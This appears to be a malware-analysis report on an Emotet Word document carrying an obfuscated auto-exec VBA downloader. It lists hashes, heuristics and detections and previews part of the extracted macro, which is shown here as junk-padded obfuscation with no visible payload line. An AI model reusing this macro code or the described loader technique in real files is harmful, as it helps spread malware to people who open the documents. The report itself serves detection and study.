Emotet Office (OLE) malware analysis — malicious · e333768e423c4aa3

MALICIOUS

Office (OLE)

243.5 KB Created: 2019-10-09 23:26:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: e60c3b1be6674bca9a254b0a63dfab6f SHA-1: ed36fc03ffe5325938fab6625ab85f68d572a832 SHA-256: e333768e423c4aa3e8d064045ab3245ce04700293b0ea520ebf5e5475ebf8da4

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains critical heuristics indicating an obfuscated auto-exec VBA loader that uses CreateObject and execution sinks, consistent with Emotet's behavior. The presence of legacy WordBasic and Excel 4.0 macros further supports this. The VBA script is heavily obfuscated, but the overall intent appears to be downloading and executing a second-stage payload, as indicated by the ClamAV detection name.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-7331189-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7331189-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 158469 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	158469 bytes
SHA-256: `e8102886ed008444cc36522fabdfa9b57db7b13232c8ef4855d49b383cd60f1c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b000806168b" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "cc62b0b7963c7, 0, 0, MSForms, TextBox" Attribute VB_Control = "x9006x00126, 1, 1, MSForms, TextBox" Attribute VB_Control = "bcbxb48b064, 2, 2, MSForms, TextBox" Attribute VB_Control = "x53bbb894x989, 3, 3, MSForms, TextBox" Attribute VB_Control = "xc90302518b, 4, 4, MSForms, TextBox" Attribute VB_Control = "cb3c2050cxx, 5, 5, MSForms, TextBox" Attribute VB_Name = "x86c50xc400b3" Function b830095910700() On Error Resume Next 'Direct7606 Ward Flat, North Tania, Nepal Human572 Fritsch Meadows, Kiehntown, Suriname b0x00b23000 = True 'Internal30090 Herman Turnpike, South Tevin, Burundi Principal862 Sylvester Plains, Cummerataview, Slovakia (Slovak Republic) Select Case c0950cb00c00 'Regional9087 Teresa Isle, Feilstad, Malta Forward371 Monserrat Parkway, North Beaulahberg, United Arab Emirates Case x63c9027271 'Chief62483 Jamel Mission, Port Baronton, Guyana Legacy46484 Arnaldo Road, Lisandroborough, Cocos (Keeling) Islands 'Forward77085 Adrain Plaza, Zechariahside, Monaco Investor718 Koss Tunnel, West Jevonmouth, Morocco c400xc7351b60 = False 'Direct0990 Lonnie Mountains, Abelardobury, Ecuador Dynamic21888 Maximilian Terrace, North Wilson, Cayman Islands b010300050b9 = bb20433xc90 'Human79433 Cummings Walk, Madysonburgh, Pakistan Senior0988 Wilderman Harbors, Port Chloe, Slovakia (Slovak Republic) c318070x54490 = CInt(b1053b0b0760 - CByte(b5x40c61c3b2)) 'Corporate4602 Patience Course, West Lou, Papua New Guinea Direct74740 Schuster Field, Spencerstad, Germany c0c57060036 = Cos(x4x17070032x8) 'Direct085 Botsford Harbor, Dietrichberg, Italy Central84671 Parisian Inlet, Bartonmouth, Malta x83b09304b4 = True 'Lead832 Rodolfo Greens, Littelbury, Bangladesh Central952 Zulauf Hollow, Casimirport, Saint Kitts and Nevis c890b120bb638 = Rnd(b050920c05010) 'Internal54859 Nienow Center, Homenickland, Mauritania Human090 Wayne Square, Virgilchester, Serbia Case x188c1840406 'Senior4434 Sanford Club, South Reganstad, Netherlands Antilles Direct627 Effertz Keys, South Vernahaven, Mexico c92573675680 = bb04260280c60 'Senior001 Odell Lane, West Maribelland, Mexico Customer7283 Colleen Isle, West Ibrahim, Maldives b0908b9802cb = CDbl(x039000542466) 'International21510 Lempi Streets, South Alexandrinefurt, Mali National33747 Maxwell Garden, Kreigerborough, Timor-Leste End Select 'Regional1033 Gillian Tunnel, North Kale, Bhutan Lead914 Greenholt Brooks, Jerdebury, Tunisia xx5xb080008 = False 'Regional26106 Lysanne Estates, New Carlee, Kiribati Chief76031 Robyn Fork, Port Dax, Mongolia 'International29783 Schinner Viaduct, Port Oscar, Brunei Darussalam Future515 Christine Rapid, Madelynport, Algeria x73bcx3669613 = True 'Direct362 Howard Pass, Flossiemouth, Peru Internal8905 Simonis Summit, South Amy, Tunisia Select Case x18cxx0b806 'Direct2739 Brown Loaf, Port Edgarview, Liechtenstein Lead0708 Kuhic Throughway, Mullerton, Bangladesh Case c9c0009400720 'Chief783 Margie Fields, North Jadyntown, Cote d'Ivoire Central059 Kertzmann Knolls, Kevontown, Benin 'Direct7341 Ray Crossing, Leonoraberg, Romania Dynamic82592 Balistreri Street, New Alisonborough, Madagascar bx01600073b0 = False 'National8823 Luciano Inlet, Lake Abigayle, Ghana Dynamic66522 Shields Village, Welchmouth, Bermuda c17060078470 = bx0x9367b370 'Investor890 Vinnie Terrace, Lake Princebury, Montenegro International29023 Chasity Shore, Pollichburgh, Indonesia b69040c803560 = CInt(b89b4565b1x0 - CByte(x3800xb8940)) 'Human8670 Palma Port, West Virginie, Cambodia ... (truncated)

SHA-256: e8102886ed008444cc36522fabdfa9b57db7b13232c8ef4855d49b383cd60f1c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b000806168b"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "cc62b0b7963c7, 0, 0, MSForms, TextBox"
Attribute VB_Control = "x9006x00126, 1, 1, MSForms, TextBox"
Attribute VB_Control = "bcbxb48b064, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x53bbb894x989, 3, 3, MSForms, TextBox"
Attribute VB_Control = "xc90302518b, 4, 4, MSForms, TextBox"
Attribute VB_Control = "cb3c2050cxx, 5, 5, MSForms, TextBox"

Attribute VB_Name = "x86c50xc400b3"
Function b830095910700()
On Error Resume Next
   'Direct7606 Ward Flat, North Tania, Nepal Human572 Fritsch Meadows, Kiehntown, Suriname
b0x00b23000 = True
'Internal30090 Herman Turnpike, South Tevin, Burundi Principal862 Sylvester Plains, Cummerataview, Slovakia (Slovak Republic)
Select Case c0950cb00c00
'Regional9087 Teresa Isle, Feilstad, Malta Forward371 Monserrat Parkway, North Beaulahberg, United Arab Emirates
         Case x63c9027271
         'Chief62483 Jamel Mission, Port Baronton, Guyana Legacy46484 Arnaldo Road, Lisandroborough, Cocos (Keeling) Islands
         'Forward77085 Adrain Plaza, Zechariahside, Monaco Investor718 Koss Tunnel, West Jevonmouth, Morocco
c400xc7351b60 = False
'Direct0990 Lonnie Mountains, Abelardobury, Ecuador Dynamic21888 Maximilian Terrace, North Wilson, Cayman Islands
            b010300050b9 = bb20433xc90
            'Human79433 Cummings Walk, Madysonburgh, Pakistan Senior0988 Wilderman Harbors, Port Chloe, Slovakia (Slovak Republic)
            c318070x54490 = CInt(b1053b0b0760 - CByte(b5x40c61c3b2))
            'Corporate4602 Patience Course, West Lou, Papua New Guinea Direct74740 Schuster Field, Spencerstad, Germany
            c0c57060036 = Cos(x4x17070032x8)
'Direct085 Botsford Harbor, Dietrichberg, Italy Central84671 Parisian Inlet, Bartonmouth, Malta
x83b09304b4 = True
'Lead832 Rodolfo Greens, Littelbury, Bangladesh Central952 Zulauf Hollow, Casimirport, Saint Kitts and Nevis
            c890b120bb638 = Rnd(b050920c05010)
            'Internal54859 Nienow Center, Homenickland, Mauritania Human090 Wayne Square, Virgilchester, Serbia
         Case x188c1840406
         'Senior4434 Sanford Club, South Reganstad, Netherlands Antilles Direct627 Effertz Keys, South Vernahaven, Mexico
            c92573675680 = bb04260280c60
            'Senior001 Odell Lane, West Maribelland, Mexico Customer7283 Colleen Isle, West Ibrahim, Maldives
            b0908b9802cb = CDbl(x039000542466)
            'International21510 Lempi Streets, South Alexandrinefurt, Mali National33747 Maxwell Garden, Kreigerborough, Timor-Leste
End Select
'Regional1033 Gillian Tunnel, North Kale, Bhutan Lead914 Greenholt Brooks, Jerdebury, Tunisia
xx5xb080008 = False
'Regional26106 Lysanne Estates, New Carlee, Kiribati Chief76031 Robyn Fork, Port Dax, Mongolia
   'International29783 Schinner Viaduct, Port Oscar, Brunei Darussalam Future515 Christine Rapid, Madelynport, Algeria
x73bcx3669613 = True
'Direct362 Howard Pass, Flossiemouth, Peru Internal8905 Simonis Summit, South Amy, Tunisia
Select Case x18cxx0b806
'Direct2739 Brown Loaf, Port Edgarview, Liechtenstein Lead0708 Kuhic Throughway, Mullerton, Bangladesh
         Case c9c0009400720
         'Chief783 Margie Fields, North Jadyntown, Cote d'Ivoire Central059 Kertzmann Knolls, Kevontown, Benin
         'Direct7341 Ray Crossing, Leonoraberg, Romania Dynamic82592 Balistreri Street, New Alisonborough, Madagascar
bx01600073b0 = False
'National8823 Luciano Inlet, Lake Abigayle, Ghana Dynamic66522 Shields Village, Welchmouth, Bermuda
            c17060078470 = bx0x9367b370
            'Investor890 Vinnie Terrace, Lake Princebury, Montenegro International29023 Chasity Shore, Pollichburgh, Indonesia
            b69040c803560 = CInt(b89b4565b1x0 - CByte(x3800xb8940))
            'Human8670 Palma Port, West Virginie, Cambodia 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.